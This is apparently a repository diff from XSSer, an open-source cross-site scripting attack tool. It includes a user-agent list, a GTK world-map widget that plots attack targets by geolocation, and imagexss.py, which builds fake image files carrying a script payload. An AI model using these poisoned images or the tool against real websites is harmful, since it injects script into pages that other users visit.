+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Oupeng/10.2.1.86910 Safari/534.30
+Mozilla/5.0 (SMART-TV; Linux; Tizen 2.3) AppleWebkit/538.1 (KHTML, like Gecko) SamsungBrowser/1.0 Safari/538.1
+myibrow/2.2 (Windows; U; Windows NT 5.1; cs; rv:1.8.1.14) Gecko/20080001 My Internet Browser/2.2.0.0 20080913235045
+Opera/9.25 (Windows NT 6.0; U; en)
+Privoxy/1.0
+CERN-LineMode/2.15
+cg-eye interactive
+China Local Browser 2.6
+ClariaBot/1.0
+Comos/0.9_(robot@xyleme.com)
+Crawler@alexa.com
+DonutP; Windows98SE
+Dr.Web (R) online scanner: http://online.drweb.com/
+Dragonfly File Reader
+Eurobot/1.0 (http://www.ayell.eu)
+FARK.com link verifier
+FavIconizer
+Feliz - Mixcat Crawler (+http://mixcat.com)
+TwitterBot (http://www.twitter.com)
+DataCha0s/2.0
+EvaalSE - bot@evaal.com
+Feedfetcher-Google; (+http://www.google.com/feedfetcher.html)
+archive.org_bot
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14
+Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
+Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36
+Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0
+Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
+Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
+Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
+Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0

File diff suppressed because it is too large
+ 1145 - 0
xsser/core/fuzzing/vectors.py


+ 616 - 0
xsser/core/globalmap.py

@@ -0,0 +1,616 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import os
+import gtk
+import user
+import gobject
+from core.reporter import XSSerReporter
+from core.curlcontrol import Curl
+from glib import markup_escape_text
+from collections import defaultdict
+from threading import Thread
+import traceback
+import urllib
+import urlparse
+import math
+import cairo
+import gzip
+import pangocairo
+import time
+
class PointType(object):
    """Marker categories, ordered so that a larger value outranks a
    smaller one when several reports land on the same coordinates."""
    crashsite = -1
    crawled = 0
    failed = 5
    success = 10
    checked = 15
+
# Marker colours as RGB triples in the 0.0-1.0 range, one per category.
crash_color = [0.1, 0.1, 0.1]
checked_color = [0, 0.8, 0.8]
failed_color = [0.8, 0.0, 0.0]
success_color = [0.0, 0.0, 0.8]
crawl_color = [0.0, 0.0, 0.0]

def gtkcol(col):
    """Scale a 0.0-1.0 RGB triple to the 16-bit ints gtk.gdk.Color wants."""
    return [int(col[i] * 65535) for i in range(3)]
+
class MapPoint(object):
    """A geolocated marker on the world map.

    Each point accumulates report strings (urls) per PointType so that
    overlapping markers can later be merged via add_reports().
    """
    def __init__(self, lat, lng, ptype, size, text):
        # ptype is one of the PointType values (crashsite..checked);
        # checked (15) ranks highest when points are merged.
        self.latitude = lat
        self.longitude = lng
        self.size = size
        self.text = text
        # reports: PointType -> list of report strings (urls)
        self.reports = defaultdict(list)
        self.reports[ptype].append(text)
        self.type = ptype
        # colour by category; anything unmatched falls back to the
        # crawl colour (as the original code did, including crashsite)
        if ptype == PointType.crawled:
            self.color = crawl_color
        elif ptype == PointType.failed:
            self.color = failed_color
        elif ptype == PointType.success:
            self.color = success_color
        elif ptype == PointType.checked:
            self.color = checked_color
        else:
            self.color = crawl_color
        self.gtkcolor = gtkcol(self.color)

    def add_reports(self, report_type, reports):
        """Merge *reports* (mapping PointType -> list of strings) into
        this point's reports.

        Note: *report_type* is kept for interface compatibility; every
        key present in either mapping is merged (the original loop
        variable shadowed the parameter, so it was never used).
        """
        # set union works on both dict views (py3) and lists (py2),
        # unlike the previous `reports.keys() + self.reports.keys()`
        for rtype in set(reports.keys()) | set(self.reports.keys()):
            self.reports[rtype].extend(reports[rtype])
+
class CrashSite(MapPoint):
    """Map marker recording where a crawler/browser crash was reported."""

    def __init__(self, lat, lng, size, desturl):
        # A crash site is simply a MapPoint tagged with the crashsite type.
        super(CrashSite, self).__init__(lat, lng, PointType.crashsite,
                                        size, desturl)
+ 
class DownloadThread(Thread):
    """Background worker that fetches the GeoLiteCity database.

    Tries each mirror in order; on success it decompresses the gzipped
    database next to the expected path and calls geomap_ready() on the
    map, otherwise it reports the failure via geomap_failed().
    """

    # Mirrors tried in order until one download succeeds.
    MIRRORS = [
        'http://xsser.03c8.net/map/GeoLiteCity.dat.gz',
        'http://xsser.sf.net/map/GeoLiteCity.dat.gz',
        'http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz',
    ]

    def __init__(self, geomap, parent):
        Thread.__init__(self)
        self.daemon = True  # don't keep the process alive on exit
        self._map = geomap
        self._parent = parent

    def run(self):
        geo_db_path = self._map.get_geodb_path()
        def reportfunc(current, blocksize, filesize):
            # urlretrieve progress hook -> parent progress display (0.0-1.0)
            percent = min(float(current)/(filesize/float(blocksize)), 1.0)
            self._parent.report_state('downloading map', percent)
        if not os.path.exists(os.path.dirname(geo_db_path)):
            os.makedirs(os.path.dirname(geo_db_path))
        self._parent.report_state('getting city database', 0.0)
        for url in self.MIRRORS:
            try:
                urllib.urlretrieve(url, geo_db_path+'.gz', reportfunc)
            except Exception:
                continue  # try the next mirror
            break
        else:
            # every mirror failed
            self._parent.report_state('error downloading map', 0.0)
            self._map.geomap_failed()
            return
        # Fix: decompress whichever mirror succeeded. Previously the
        # decompression lived in a try/else clause that only ran when the
        # FIRST mirror worked, so successful fallback downloads were
        # never unpacked and geomap_ready() was never called.
        self._parent.report_state('map downloaded (restart XSSer!!!!)', 0.0)
        f_in = gzip.open(geo_db_path+'.gz', 'rb')
        try:
            f_out = open(geo_db_path, 'wb')
            try:
                f_out.write(f_in.read())
            finally:
                f_out.close()
        finally:
            f_in.close()
        print('deleting gzipped file')
        os.remove(geo_db_path+'.gz')
        self._map.geomap_ready()
+
class GlobalMap(gtk.DrawingArea, XSSerReporter):
    """World-map widget that plots crawl/attack activity geographically.

    Host names are resolved to coordinates through the MaxMind
    GeoLiteCity database; when the database file is missing it is
    fetched asynchronously by a DownloadThread and initialization is
    completed once the file is available.
    """
    def __init__(self, parent, pixbuf, onattack=False):
        gtk.DrawingArea.__init__(self)
        geo_db_path = self.get_geodb_path()
        self._parent = parent
        self._pixbuf = pixbuf      # world-map background image
        self._cache_geo = {}       # hostname -> (lat, lon) lookup cache
        self.geo = None            # GeoIP handle, set by finish_init()
        self._onattack = onattack
        if not os.path.exists(geo_db_path):
            # no city database yet: download in the background, then
            # finish_init() runs via geomap_ready()
            self._t = DownloadThread(self, parent)
            self._t.start()
        else:
            self.finish_init()

    def geomap_ready(self):
        """Download-thread callback: schedule finish_init on the GUI loop."""
        gtk.gdk.threads_enter()
        gobject.timeout_add(0, self.finish_init)
        gtk.gdk.threads_leave()

    def geomap_failed(self):
        """Download-thread callback for a failed database download."""
        gtk.gdk.threads_enter()
        gobject.timeout_add(0, self.failed_init)
        gtk.gdk.threads_leave()

    def failed_init(self):
        """Reap the download thread after a failed download."""
        if hasattr(self, '_t'):
            self._t.join()
            delattr(self, '_t')

    def finish_init(self):
        """Open the GeoIP database and set up all drawing state."""
        import GeoIP
        if hasattr(self, '_t'):
            self._t.join()
            delattr(self, '_t')
        parent = self._parent
        geo_db_path = self.get_geodb_path()
        Geo = GeoIP.open(geo_db_path, GeoIP.GEOIP_STANDARD)
        self.geo = Geo
        self.set_has_tooltip(True)
        self._max_points = 200      # cap on simultaneously kept points
        self._lasttime = 0.0        # timestamp of the previous draw pass
        self.context = None
        self.mapcontext = None
        self._mappixbuf = None
        self._selected = []         # indices of points under the pointer
        self._current_text = ["", 0.0]  # [last url, remaining fade time]
        # counters indexed by activity: crawled/failed/success/checked/crashed
        # (indices 5 and 6 appear unused in this class)
        self._stats = [0,0,0,0,0,0,0]
        self.width = self._pixbuf.get_width()
        self.height = self._pixbuf.get_height()
        self._min_x = 0
        self._max_x = self.width
        self._drawn_points = []     # [x, y, index] for hit-testing
        self._lines = []            # [lat, lon, d_lat, d_lon, alpha]
        self._frozenlines = []      # lines already baked into the map surface
        self._points = []
        self._crosses = []
        self.connect("expose_event", self.expose)
        self.connect("query-tooltip", self.on_query_tooltip)
        if self.window:
            self.window.invalidate_rect(self.allocation, True)
        if not self._onattack:
            self.add_test_points()

    def get_geodb_path(self):
        """Return the GeoLiteCity.dat path: bundled gtk/ dir if present,
        otherwise ~/.xsser/."""
        ownpath = os.path.dirname(os.path.dirname(__file__))
        gtkpath = os.path.join(ownpath, 'gtk')
        if os.path.exists(os.path.join(gtkpath, 'GeoLiteCity.dat')):
            return os.path.join(gtkpath, 'GeoLiteCity.dat')
        else:
            return os.path.join(user.home, '.xsser', 'GeoLiteCity.dat')

    def find_points(self, x, y, distance=9.0):
        """Return (and visually enlarge) the drawn points near pixel (x, y).

        *distance* is compared against the squared pixel distance.
        """
        points = []
        self._selected = []
        for idx, point in enumerate(self._drawn_points):
            d_x = x-point[0]
            d_y = y-point[1]
            if d_y*d_y+d_x*d_x < distance:
                self._points[point[2]].size = 4.0  # grow the hovered point
                points.append(self._points[point[2]])
                self._selected.append(point[2])
        if points:
            rect = gtk.gdk.Rectangle(0,0,self.width, self.height)
            self.window.invalidate_rect(rect, True)
        return points

    def on_query_tooltip(self, widget, x, y, keyboard_mode, tooltip):
        """Build a pango-markup tooltip listing the reports of the points
        under the pointer. Returns True when a tooltip is shown."""
        if not self.geo:
            return False
        points = self.find_points(x, y)
        if points:
            text = ""
            success = []
            finalsuccess = []
            failures = []
            crawls = []
            for point in points:
                finalsuccess.extend(point.reports[PointType.checked])
                success.extend(point.reports[PointType.success])
                failures.extend(point.reports[PointType.failed])
                crawls.extend(point.reports[PointType.crawled])
            if finalsuccess:
                text += "<b>browser checked sucesses:</b>\n"
                text += "\n".join(map(lambda s: markup_escape_text(s), finalsuccess))
                if failures or success:
                    text += "\n"

            if success:
                text += "<b>sucesses:</b>\n"
                text += "\n".join(map(lambda s: markup_escape_text(s), success))
                if failures:
                    text += "\n"
            if failures:
                text += "<b>failures:</b>\n"
                text += "\n".join(map(lambda s: markup_escape_text(s), failures))
            # crawl urls are only interesting when nothing else happened here
            if crawls and not failures and not success:
                text += "<b>crawls:</b>\n"
                text += "\n".join(map(lambda s: markup_escape_text(s), crawls))

            tooltip.set_markup(str(text))
            return True
        return False

    def add_test_points(self):
        """Drop a few fixed points near (0, 0) so the idle map isn't empty."""
        self.add_point(0.0, 0.0)
        self.add_point(0.0, 5.0)
        self.add_point(0.0, 10.0)
        self.add_point(0.0, 15.0)
        self.add_point(5.0, 0.0)
        self.add_point(10.0, 0.0)
        self.add_point(15.0, 0.0)

    def clear(self):
        """Reset all drawn state and statistics (used on attack start)."""
        self._points = []
        self._lines = []
        self.mapcontext = None
        self._frozenlines = []
        self._crosses = []
        self._stats = [0,0,0,0,0,0,0]

    def expose(self, widget, event):
        """expose_event handler: blit the cached map surface, then draw
        the dynamic overlay."""
        if not self.mapcontext:
            # lazily build a writable copy of the background to bake
            # "frozen" lines into
            self._mappixbuf = self._pixbuf.copy()
            self.mapsurface = cairo.ImageSurface.create_for_data(self._mappixbuf.get_pixels_array(), 
                                               cairo.FORMAT_ARGB32,
                                               self.width,
                                               self.height,
                                               self._pixbuf.get_rowstride())
            self.mapcontext = cairo.Context(self.mapsurface)
        self.draw_frozen_lines()
        self.context = self.window.cairo_create()
      
        self.context.set_source_surface(self.mapsurface)
        self.context.rectangle(event.area.x, event.area.y,
                              event.area.width, event.area.height)
        self.context.clip()
        self.context.rectangle(event.area.x, event.area.y,
                              event.area.width, event.area.height)
        self.context.fill()
        self.context.set_source_color(gtk.gdk.Color(0,0,0))
        self._min_x = 5 # we have the scale at the left for now
        self._max_x = 0
        if self.geo:
            self.draw(self.context)
        return False

    def add_point(self, lng, lat, point_type=PointType.crawled, desturl="testpoint"):
        """Append a marker of *point_type* at (lat, lng)."""
        map_point = MapPoint(lat, lng, point_type, 5.0, desturl)
        map_point.x, map_point.y = self.plot_point(lat, lng)
        self._points.append(map_point)

    def add_cross(self, lng, lat, col=[0,0,0], desturl="testpoint"):
        """Add a crash cross at (lat, lng) unless one is already there.
        NOTE(review): *col* is accepted but never used — kept for
        interface compatibility."""
        for a in self._crosses:
            if a.latitude == lat and a.longitude == lng:
                return
        crash_site = CrashSite(lat, lng, 5.0, desturl)
        crash_site.x, crash_site.y = self.plot_point(lat, lng)
        self.adjust_bounds(crash_site.x, crash_site.y)
        self._crosses.append(crash_site)
        self.queue_redraw()

    def insert_point(self, lng, lat, col=[0,0,0], desturl="testpoint",
                     point_type=PointType.crawled):
        """Insert a marker at the head of the draw list.

        Fix: *point_type* used to be an undefined name here (guaranteed
        NameError); it is now a parameter defaulting to a crawl point.
        The screen coordinates are also computed, matching add_point(),
        since draw_point() reads .x/.y.
        """
        map_point = MapPoint(lat, lng, point_type, 5.0, desturl)
        map_point.x, map_point.y = self.plot_point(lat, lng)
        self._points.insert(0, map_point)

    def _preprocess_points(self):
        """Merge points that share the same coordinates.

        Per coordinate the highest-priority point survives (plus the
        largest one, if it is a different object); the reports of all
        dropped points are merged into the priority winner.
        """
        newpoints = defaultdict(list)
        for point in self._points:
            key = (point.latitude, point.longitude)
            newpoints[key].append(point)

        self._points = []
        for points in newpoints.itervalues():
            win_type = points[0]
            win_size = points[0]
            for point in points[1:]:
                if point.type > win_type.type:
                    win_type = point
                # fix: compare against the current size winner
                # (previously compared against win_type.size, so
                # win_size did not reliably track the largest point)
                if point.size > win_size.size:
                    win_size = point
            self._points.append(win_type)
            if win_type != win_size:
                self._points.append(win_size)
            for point in points:
                if not point in [win_size, win_type]:
                    win_type.add_reports(point.type, point.reports)
        if len(self._points) > self._max_points:
            self._points = self._points[:self._max_points]

    def draw_frozen_lines(self):
        """Bake fully faded lines into the cached map surface so they
        need not be redrawn every frame."""
        for line in self._lines[len(self._frozenlines):]:
            if line[4] <= 0.5:
                self.draw_line(self.mapcontext, line)
                self._frozenlines.append(line)

    def draw(self, context, failures=True):
        """Render crosses, lines, points and the stat bars.

        Runs twice per expose: first with failures=True (crawl/failed
        layer plus stats), which then recurses once with failures=False
        for the success/checked layer and the fading url text.
        """
        self._preprocess_points()
        if self._lasttime == 0:
            self._lasttime = time.time()-0.04
        currtime = time.time()
        timepassed = currtime - self._lasttime
        redraw = False
        if failures:
            self._drawn_points = []
            for cross in reversed(self._crosses):
                if cross.size > 0.1:
                    cross.size -= timepassed*2  # shrink/fade the cross
                else:
                    self._crosses.remove(cross)
                if cross.size > 0.1:
                    redraw = True
                self.draw_cross(cross)
            for line in reversed(self._lines[len(self._frozenlines):]):
                if line[4] > 0.5:
                    line[4] -= timepassed*2  # fade the link line
                if line[4] > 0.5:
                    redraw = True
                self.draw_line(self.context, line)

        for idx, point in enumerate(self._points):
            # success/checked points belong to the second (failures=False)
            # pass; everything else to the first
            if point.type >= PointType.success: 
                if failures:
                    continue
            else:
                if not failures:
                    continue
            if point.size > 1.0 and not idx in self._selected:
                point.size -= timepassed*2
                redraw = True
            elif point.size < 1.0:
                point.size = 1.0
            self.draw_point(point)
            x = point.x
            y = point.y
            self.adjust_bounds(x, y)
            self._drawn_points.append([x, y, idx])
        stat_f = 1.0
        if failures:
            # stat bars at fixed map coordinates; counts wrap at
            # _max_points and overflow is drawn as a second inverted bar
            mp = self._max_points
            self.draw_bar((-45,-160,crawl_color,(self._stats[0]%mp)*stat_f))
            self.draw_bar((-45,-155,failed_color,(self._stats[1]%mp)*stat_f))
            self.draw_bar((-45,-150,success_color,(self._stats[2]%mp)*stat_f))
            self.draw_bar((-45,-145,checked_color,(self._stats[3]%mp)*stat_f))
            if int(self._stats[0] / mp):
                self.draw_bar((-46,-160,crawl_color,-2-(self._stats[0]/mp)*stat_f))
            if int(self._stats[1] / mp):
                self.draw_bar((-46,-155,failed_color,-2-(self._stats[1]/mp)*stat_f))
            if int(self._stats[2] / mp):
                self.draw_bar((-46,-150,success_color,-2-(self._stats[2]/mp)*stat_f))
            if int(self._stats[3] / mp):
                self.draw_bar((-46,-145,checked_color,-2-(self._stats[3]/mp)*stat_f))
            self.draw(context, False)
        else:
            if self._current_text[1] > 0.0:
                self.draw_text(100, self.height-50, self._current_text[0])
                self._current_text[1] -= timepassed*4
            self._lasttime = currtime
        if redraw:
            self.queue_redraw()

    def adjust_bounds(self, x, y):
        """Widen the horizontal dirty region to include pixel x (+/-20)."""
        if x-20 < self._min_x:
            self._min_x = x-20
        elif x+20 > self._max_x:
            self._max_x = x+20

    def draw_text(self, x, y, text):
        """Draw the netloc of *text* (a url) fading with _current_text[1]."""
        self.context.save()
        self.context.move_to(x, y)
        v = (5.0-self._current_text[1])/5.0
        # NOTE(review): max(v, 1.0) keeps the scale factor >= 1.1 always;
        # min() may have been intended — left as-is to preserve behavior.
        self.context.scale(0.1+max(v, 1.0), 0.1+max(v, 1.0))
        self.context.set_source_color(gtk.gdk.Color(*gtkcol((v,)*3)))
        u = urlparse.urlparse(text)
        self.context.show_text(u.netloc)
        self.context.restore()

    def draw_bar(self, point):
        """Draw one statistics bar; point is (lat, lng, rgb, height)."""
        if point[3]:
            self.context.save()
            x, y = self.plot_point(point[0], point[1])
            self.context.set_source_rgb(*point[2])
            self.context.rectangle(x, y, 5, -(2.0+point[3]))
            self.context.fill()
            self.context.restore()
            return x, y

    def draw_line(self, context, line):
        """Draw a link line [lat, lon, d_lat, d_lon, alpha] on *context*."""
        if line[4]:
            context.save()
            x, y = self.plot_point(line[0], line[1])
            x2, y2 = self.plot_point(line[2], line[3])
            self.adjust_bounds(x, y)
            self.adjust_bounds(x2, y2)
            context.set_line_width(1.0)
            context.set_source_rgba(0.0, 0.0, 0.0, float(line[4])/5.0)
            context.move_to(x, y)
            context.rel_line_to(x2-x, y2-y)
            context.stroke()
            context.restore()

    def draw_point(self, point):
        """Draw a MapPoint as a filled circle scaled by its size."""
        if point.size:
            self.context.save()
            self.context.set_source_color(gtk.gdk.Color(*point.gtkcolor))
            self.context.translate(point.x, point.y)
            self.context.arc(0.0, 0.0, 2.4*point.size, 0, 2*math.pi)
            self.context.close_path()
            self.context.fill()
            self.context.restore()

    def draw_cross(self, point):
        """Draw a crash site as a rotated X scaled by its size."""
        if point.size:
            self.context.save()
            self.context.translate(point.x, point.y)
            self.context.rotate(point.size)
            self.context.set_line_width(0.8*point.size)
            self.context.set_source_color(gtk.gdk.Color(*point.gtkcolor))
            self.context.move_to(-3*point.size, -3*point.size)
            self.context.rel_line_to(6*point.size, 6*point.size)
            self.context.stroke()
            self.context.move_to(-3*point.size, +3*point.size)
            self.context.rel_line_to(6*point.size, -6*point.size)
            self.context.stroke()
            self.context.restore()


    def get_latlon_fromurl(self, url):
        """Resolve *url*'s host to (latitude, longitude) via GeoIP.

        Results are memoized per hostname; returns None when GeoIP has
        no record (callers treat any failure as 'skip this url').
        """
        parsed_url = urlparse.urlparse(url)
        split_netloc = parsed_url.netloc.split(":")
        if len(split_netloc) == 2:
            server_name, port = split_netloc
        else:
            server_name = parsed_url.netloc
            port = None

        if server_name in self._cache_geo:
            return self._cache_geo[server_name]
        Geodata = self.geo.record_by_name(server_name)
        if Geodata:
            country_name = Geodata['country_name']  # unused, kept as-is
            longitude = Geodata['longitude']
            latitude = Geodata['latitude']
            self._cache_geo[server_name] = (latitude, longitude)
            return latitude, longitude

    def start_attack(self):
        """Reset the map state at the start of a new attack run."""
        self.clear()

    def queue_redraw(self):
        """Invalidate the horizontal strip touched since the last draw."""
        rect = gtk.gdk.region_rectangle((self._min_x,0,self._max_x-self._min_x,
                                  self.height))
        if self.window:
            self.window.invalidate_region(rect, True)
            del rect

    def mosquito_crashed(self, dest_url, reason):
        """Reporter hook: mark a crash cross at dest_url's location."""
        self._current_text = [dest_url, 5.0]
        self._stats[4] += 1
        try:
            lat, lon = self.get_latlon_fromurl(dest_url)
        except:
            return  # unresolvable host: nothing to plot
        self.add_cross(lon, lat, crash_color, dest_url)
        gtk.gdk.threads_enter()
        self.queue_redraw()
        gtk.gdk.threads_leave()

    def add_checked(self, dest_url):
        """Reporter hook: plot a browser-checked success point."""
        self._current_text = [dest_url, 5.0]
        self._stats[3] += 1
        try:
            lat, lon = self.get_latlon_fromurl(dest_url)
        except:
            return
        self.add_point(lon, lat, PointType.checked, dest_url)
        gtk.gdk.threads_enter()
        self.queue_redraw()
        gtk.gdk.threads_leave()

    def add_success(self, dest_url):
        """Reporter hook: plot a successful injection point."""
        self._current_text = [dest_url, 5.0]
        self._stats[2] += 1
        try:
            lat, lon = self.get_latlon_fromurl(dest_url)
        except:
            return
        self.add_point(lon, lat, PointType.success, dest_url)
        gtk.gdk.threads_enter()
        self.queue_redraw()
        gtk.gdk.threads_leave()

    def add_failure(self, dest_url):
        """Reporter hook: plot a failed injection point."""
        self._current_text = [dest_url, 5.0]
        self._stats[1] += 1
        try:
            lat, lon = self.get_latlon_fromurl(dest_url)
        except:
            return
        self.add_point(lon, lat, PointType.failed, dest_url)
        gtk.gdk.threads_enter()
        self.queue_redraw()
        gtk.gdk.threads_leave()

    def add_link(self, orig_url, dest_url):
        """Reporter hook: add a fading line between two resolvable urls
        (skipped when either host is unresolvable, identical, or the
        line already exists)."""
        try:
            lat, lon = self.get_latlon_fromurl(orig_url)
        except:
            return
        try:
            d_lat, d_lon = self.get_latlon_fromurl(dest_url)
        except:
            return
        if lat == d_lat and lon == d_lon:
            return
        for a in self._lines:
            if a[0] == lat and a[1] == lon and a[2] == d_lat and a[3] == d_lon:
                return
        self._lines.append([lat, lon, d_lat, d_lon, 0.5])

    def start_crawl(self, dest_url):
        """Reporter hook: plot a crawl point."""
        self._current_text = [dest_url, 5.0]
        self._stats[0] += 1
        try:
            lat, lon = self.get_latlon_fromurl(dest_url)
        except:
            return
        self.add_point(lon, lat, PointType.crawled, dest_url)
        gtk.gdk.threads_enter()
        self.queue_redraw()
        gtk.gdk.threads_leave()

    def plot_point_mercator(self, lat, lng):
        """Project (lat, lng) to pixels with a Mercator projection.
        (Unused by plot_point; kept as an alternative projection.)"""
        longitude_shift = -23
        map_width = self.width
        map_height = self.height
        y_pos =  -1

        x = int((map_width * (180.0 + lng) / 360.0) + longitude_shift) % map_width
        lat = lat * math.pi / 180;  # convert from degrees to radians
        y = math.log(math.tan((lat/2.0) + (math.pi/4.0)))
        y = (map_height / 2.0) - (map_width * y / (2.0*math.pi)) + y_pos
        return x, y

    def plot_point_mercatormiller(self, lat, lng):
        """Project (lat, lng) to pixels with a Miller-style projection.
        (Unused by plot_point; kept as an alternative projection.)"""
        longitude_shift = 0
        map_width = self.width
        map_height = self.height
        y_pos = 70

        x = int((map_width * (180.0 + lng) / 360.0) + longitude_shift) % map_width
        lat = lat * math.pi / 180.0;  # convert from degrees to radians
        y = 1.25*math.log(math.tan((lat/2.5) + (math.pi/4.0)))
        y = (map_height / 2.0) - (map_width * y / (2.0*math.pi)) + y_pos
        return x, y

    def plot_point_equirectangular(self, lat, lng):
        """Project (lat, lng) to pixels with the (tweaked) equirectangular
        projection used by the bundled map image."""
        longitude_shift = -23
        map_width = self.width
        map_height = self.height
        y_pos = 0
        # empirical vertical stretch matching the background image
        magic_factor = 1.1
        x = int((map_width * (180.0 + lng) / 360.0) + longitude_shift) % map_width
        y = int((map_height / 2.0) - int((map_height * (lat) / 180.0)*magic_factor))
        return x,y

    def plot_point(self, lat, lng):
        """Project (lat, lng) to pixel coordinates and widen the dirty
        region bounds to include the result."""
        x, y = self.plot_point_equirectangular(lat, lng)

        if x-20 < self._min_x:
            self._min_x = x-20
        if x+20 > self._max_x:
            self._max_x = x+20
        return x, y

File diff suppressed because it is too large
+ 1974 - 0
xsser/core/gtkcontroller.py


+ 68 - 0
xsser/core/imagexss.py

@@ -0,0 +1,68 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
+$Id$
+
+This file is part of the xsser project, http://xsser.03c8.net
+
+Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+
+xsser is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 3 of the License.
+
+xsser is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with xsser; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+import os
+
+class ImageInjections(object):
+    
+    def __init__(self, payload =''):
+        self._payload = payload
+
+    def image_xss(self, filename, payload):
+        """
+        Create -fake- image with code XSS injected.
+        """
+        # check user image name input valid extensions
+        root, ext = os.path.splitext(filename)
+        
+	# create file and inject code
+        if ext.lower() in [".png", ".jpg", ".gif", ".bmp"]:
+            f = open(filename, 'wb')
+						                
+            # check user payload input
+            user_payload = payload
+            if not user_payload:
+                user_payload = "<script>alert('XSS')</script>"
+	
+            # inject each XSS specific code     
+            if ext.lower() == ".png":
+                content = '‰PNG' + user_payload
+            elif ext.lower() == ".gif":
+                content = 'GIF89a' + user_payload
+            elif ext.lower() == ".jpg":
+                content = 'ÿØÿà JFIF' + user_payload
+            elif ext.lower() == ".bmp":
+                content = 'BMFÖ' + user_payload
+
+            # write and close
+            f.write(content)
+            f.close()
+
+            image_results = "\nCode: "+ content + "\nFile: ", root + ext
+        else:
+            image_results = "\nPlease select a supported extension = .PNG, .GIF, .JPG or .BMP"
+        return image_results
+
+if __name__ == '__main__':
+    # smoke test: poison a PNG with the classic alert() payload (Python 2 print)
+    image_xss_injection = ImageInjections('')
+    print image_xss_injection.image_xss('ImageXSSpoison.png' , "<script>alert('XSS')</script>")

File diff suppressed because it is too large
+ 2694 - 0
xsser/core/main.py


+ 164 - 0
xsser/core/mozchecker.py

@@ -0,0 +1,164 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-"
+# vim: set expandtab tabstop=4 shiftwidth=4:
+"""
